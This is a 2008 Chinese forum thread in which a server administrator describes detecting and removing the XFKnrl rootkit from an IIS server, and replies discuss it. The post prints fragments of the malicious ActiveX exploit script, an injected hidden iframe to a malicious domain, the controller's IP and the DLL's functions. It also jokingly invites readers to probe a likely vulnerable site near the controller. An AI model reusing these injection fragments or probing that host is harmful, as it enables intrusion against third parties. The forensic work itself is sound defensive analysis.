免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 7218 | 回复: 8
打印 上一主题 下一主题

Ring0级的rootkit XFKnrl的发现、删除及其他 [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2008-04-17 15:23 |只看该作者 |倒序浏览


  1. 1、
  2. 首先是发现浏览该服务器网页时,最底端加入了一段iframe:
  3. [url]http://bh.jebooo.com/3002.htm[/url]
  4. 追查该代码,关键字:
  5. BD96C556-65A3-11D0-983A-00C04FC29
  6. var real=new ActiveXObject("IERPCtl.IERPCtl.1");
  7. var storm=new window["ActiveXObject"]("MP"+"S.S"+"tor"+"mPl"+"ayer");
  8. var Lz=new ActiveXObject("GLC"+"HAT.G"+"LCh"+"atC"+"trl.1");
  9. function GetCookie_cnzz(name)
  10. 应该是利用了ie的一些activex漏洞进行种木马和刷流量的操作


  11. 2、
  12. 追查工作暂时放到一边,首要问题是解决服务器异常
  13. 最开始是怀疑有arp攻击,登录到服务器上查看
  14. arp -a得到网关mac,与正确的网关mac一致,windump抓包
  15. windump -X -i 3 -n arp
  16. 也没有发现异常arp广播
  17. 检查web文件,也正常,底部并没有加码
  18. 初步确定是服务器本身有问题


  19. 3、
  20. 继续抓包,查看http包
  21. windump -X -i 3 -s 65535 -n host **.**.**.** and port 80
  22. 发现在正常的页面请求结束前,被插入了一段
  23. 10:06:39.430635 IP xx.xx.xx.xx.80 > yy.yy.yy.yy.2407: P 254:325(71) ack 417
  24. win 65119
  25.         0x0000:  4500 006f 1251 4000 8006 d0c4 d233 b9ca  [email]E..o.Q@......3[/email]..
  26.         0x0010:  d233 b941 0050 0967 fddc 6d08 11ce dc82  .3.A.P.g..m.....
  27.         0x0020:  5018 fe5f 17d5 0000 0d0a 3c69 6672 616d  P.._......<ifram
  28.         0x0030:  6520 7372 633d 6874 7470 3a2f 2f62 682e  e.src=http://bh.
  29.         0x0040:  6a65 626f 6f6f 2e63 6f6d 2f33 3030 322e  jebooo.com/3002.
  30.         0x0050:  6874 6d20 7769 6474 683d 3020 6865 6967  htm.width=0.heig
  31.         0x0060:  6874 3d30 3e3c 2f69 6672 616d 653e 00    ht=0></iframe>.

  32. 正是页面底部被嵌入的iframe
  33. 这说明服务器的iis进程或网卡驱动被hook,在侦测到某种类型文件的http请求后,在传输结束前挂马



  34. 4、
  35. 检查服务器,查看进程、服务、N处注册表启动项、系统帐号
  36. 均未发现异常
  37. 请出icesword,检查内核模块,发现两个可疑的家伙
  38. XFKnrl.sys 和 rvdport.sys
  39. 文件路径都是system32\drivers\,但到该目录下查找并没有这两个文件,基本能确定是rootkit了
  40. 正常的内核模块没必要隐藏自己
  41. procexp搜索全部进程的handle,果然
  42. 发现在inetinfo进程中有 \device\XFKnrl加载项,iis被插了!



  43. 5、
  44. 用Wsyscheck和RkUnhooker再进一步检查内核模块和驱动
  45. 除了icesword查到的两个sys之外再没有其他发现
  46. ssdt和fsd的各个函数也没有被hook的报告
  47. NtQueryDirectoryFile
  48. NtQuerySystemInformation
  49. NtDeviceIoControlFile
  50. 都正常!
  51. 但在wsyscheck的“安全检查”-“端口状态”中发现,进程inetinfo每几秒就向61.164.176.139:3002发syn

  52. 12:01:20.108071 IP xx.xx.xx.xx.4627 > 61.164.176.139.3002: S 3273827924:32738
  53. 27924(0) win 65535 <mss 1460,nop,nop,sackOK>
  54.         0x0000:  4500 0030 125f 4000 8006 6e3b d233 b9ca  [email]E..0._@...n[/email];.3..
  55.         0x0010:  3da4 b08b 1213 0bba c322 a654 0000 0000  =........".T....
  56.         0x0020:  7002 ffff 81ad 0000 0204 05b4 0101 0402  p...............
  57. 12:01:20.180418 IP 61.164.176.139.3002 > xx.xx.xx.xx.4627: R 0:0(0) ack 1 win
  58. 0
  59.         0x0000:  4500 0028 0186 0000 7306 cc1c 3da4 b08b  E..(....s...=...
  60.         0x0010:  d233 b9ca 0bba 1213 0000 0000 c322 a655  .3...........".U
  61.         0x0020:  5014 0000 ae5d 0000 aaaa 0000 aaaa       P....]........
  62. 12:01:22.592705 IP xx.xx.xx.xx.4628 > 61.164.176.139.3002: S 1189036599:11890
  63. 36599(0) win 65535 <mss 1460,nop,nop,sackOK>
  64.         0x0000:  4500 0030 126a 4000 8006 6e30 d233 b9ca  [email]E..0.j@...n0.3[/email]..
  65.         0x0010:  3da4 b08b 1214 0bba 46df 4237 0000 0000  =.......F.B7....
  66.         0x0020:  7002 ffff 620d 0000 0204 05b4 0101 0402  p...b...........
  67. 12:01:22.654909 IP 61.164.176.139.3002 > xx.xx.xx.xx.4628: R 0:0(0) ack 11890
  68. 36600 win 0
  69.         0x0000:  4500 0028 2deb 0000 7306 9fb7 3da4 b08b  E..(-...s...=...
  70.         0x0010:  d233 b9ca 0bba 1214 0000 0000 46df 4238  .3..........F.B8
  71.         0x0020:  5014 0000 8ebd 0000 aaaa 0000 aaaa       P.............

  72. 61.164.176.139基本可以确定就是rootkit的控制端了




  73. 6、
  74. google了一下XFKnrl,没发现太多有用的信息
  75. 只好先在system32\drivers\下建立两个0字节的文件XFKnrl.sys 和 rvdport.sys
  76. 删除所有文件权限,重启
  77. web页面挂马问题消失,内核模块XFKnrl和rvdport也都没有加载
  78. 但进程inetinfo依然向61.164.176.139:3002发包!
  79. 先用组策略ipsec封掉到61.164.176.0/24网段和端口3002的通讯
  80. 继续检查系统



  81. 7、
  82. 再次procexp搜索全部进程的handle,没有发现XFKrnl和rvdport的踪影
  83. 又检查了一遍内核模块和驱动,没有新发现
  84. 目标锁定在了inetinfo进程上
  85. 用wsyscheck查inetinfo的线程信息,对比其他正常服务器的该项信息
  86. 发现异常线程iisencv.dll
  87. procexp搜索全部进程的dll,发现iisencv.dll 插入到了inetinfo.exe和 w3wp.exe中
  88. 结束该线程后,inetinfo停止向61.164.176.139:3002发包!
  89. 但随后检查内核模块时发现,XFKnrl居然又被加载了!
  90. 这至少证明了iisencv.dll和XFKnrl.sys的关系


  91. 8、
  92. 搜索注册表iisencv.dll,发现
  93. [HKEY_CURRENT_USER\Software\Microsoft\Search Assistant\ACMru\5603]
  94. "000"="iisecnv.dll"
  95. "001"="mswsock.dll"
  96. "002"="ntdll.dll"
  97. "003"="ntkrnlpa.exe"
  98. "004"="*.gif"
  99. "005"="usbcams3.sys"
  100. "006"="AtiSrv.exe"
  101. "007"="usbhcid.sys"
  102. "008"="*.exe"

  103. [HKEY_CURRENT_USER\Software\Microsoft\Search Assistant\ACMru\5604]
  104. "000"="jebooo"
  105. "001"="bh.jebooo.com"
  106. "002"="xf.jebooo.com"



  107. 9、
  108. 终极操作:
  109. 在system32\drivers\下建立两个0字节的文件XFKnrl.sys 和 rvdport.sys删除所有文件权限
  110. 删除注册表中相关项和文件
  111. 用wsyscheck的“重启后删除文件”功能,添加c:/windows/system32/inetsrv/iisencv.dll,重启

  112. 内核模块XFKnrl.sys和rvdport.sys没有被加载,inetinfo进程也不再发包,但IIS崩溃了!
  113. 重新安装iis,恢复.net2.0的web扩展服务,重建web站点,貌似一切恢复正常了。



  114. 10、
  115. 把iisencv.dll抓到本地,IDA pro分析
  116. 基本功能大致包括了:
  117. httpfilter-过滤http协议
  118. hook \\inetsrv\wamreg.dll
  119. 加载驱动  system32\drivers\XFKnrl.sys
  120. 调用cmd.exe
  121. md5filt
  122. aspnet_filter
  123. CopyFileA  DeleteFileA  隐藏和删除文件


  124. 大概能知道这个XFKnrl rootkit都做了些什么,它没有做隐藏进程和端口的操作,对文件也只是在内核模块加载到内存高位后进行删除操作,
  125. 所以查ssdt没有什么发现是正常的,开始我还以为真的有这么NB的rootkit可以绕过icesword、wsyscheck和RkUnhooker的检查呢!
  126. 主要的功能就是过滤http协议,外加得到一个反弹的shell,如果不是它的驱动是运行在kernel模式,还真不好意思叫它ring0 !



  127. 11、
  128. 后续问题:
  129. 先去拜访一下61.164.176.139
  130. inetnum:      61.164.176.128 - 61.164.176.143
  131. netname:      YIWU-RONGJI-BUISNESS
  132. country:      CN
  133. descr:        Yiwu Rongji Handware Buisness
  134. 该段里有个应用系统
  135. [url]http://www.lunababe.com/[/url]
  136. 估计也是漏洞一大堆,有兴趣的可以去看一下,也许能搞到XFKnrl的控制端,哈哈~


  137. 12、
  138. 唠叨几句:
  139. 中了rootkit最好还是重装
  140. 测试用服务器正式上线前最好也是重装
  141. 防火墙外运行的服务器拿到里边来之前最好也重装
  142. 尽量用从可靠途径获得的系统软件

复制代码

论坛徽章:
0
2 [报告]
发表于 2008-04-18 12:37 |只看该作者
试下超级巡警

论坛徽章:
1
荣誉版主
日期:2011-11-23 16:44:17
3 [报告]
发表于 2008-04-21 19:54 |只看该作者

回复 #1 t920 的帖子

不能是你那里的机器叫人家给搞了吧?

论坛徽章:
0
4 [报告]
发表于 2008-04-22 12:21 |只看该作者
还是不知道是怎么进来的?那么下次怎样防御呢?

论坛徽章:
0
5 [报告]
发表于 2008-04-22 13:53 |只看该作者
我爱臭豆腐

        发表于 2008-4-21 19:54

不能是你那里的机器叫人家给搞了吧?


哈,是啊


唯三色彩

        发表于 2008-4-22 12:21

还是不知道是怎么进来的?那么下次怎样防御呢?


有可能是注入,也可能是做测试的时候有弱口令之类的漏洞,还有可能是安装了不安全的软件……

论坛徽章:
0
6 [报告]
发表于 2008-05-08 01:31 |只看该作者
嗯,不错。多写些paper,参加VB2008 ,呵呵

论坛徽章:
0
7 [报告]
发表于 2008-05-22 11:03 |只看该作者
很多时候,服务器的软件安装源真的很重要

论坛徽章:
0
8 [报告]
发表于 2008-05-22 13:37 |只看该作者
windows技术啊。挺厉害。windows下高手很多的。呵呵

论坛徽章:
0
9 [报告]
发表于 2008-12-24 01:00 |只看该作者
我的好像是在安装serv-u  6.41汉化的时候带入的
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP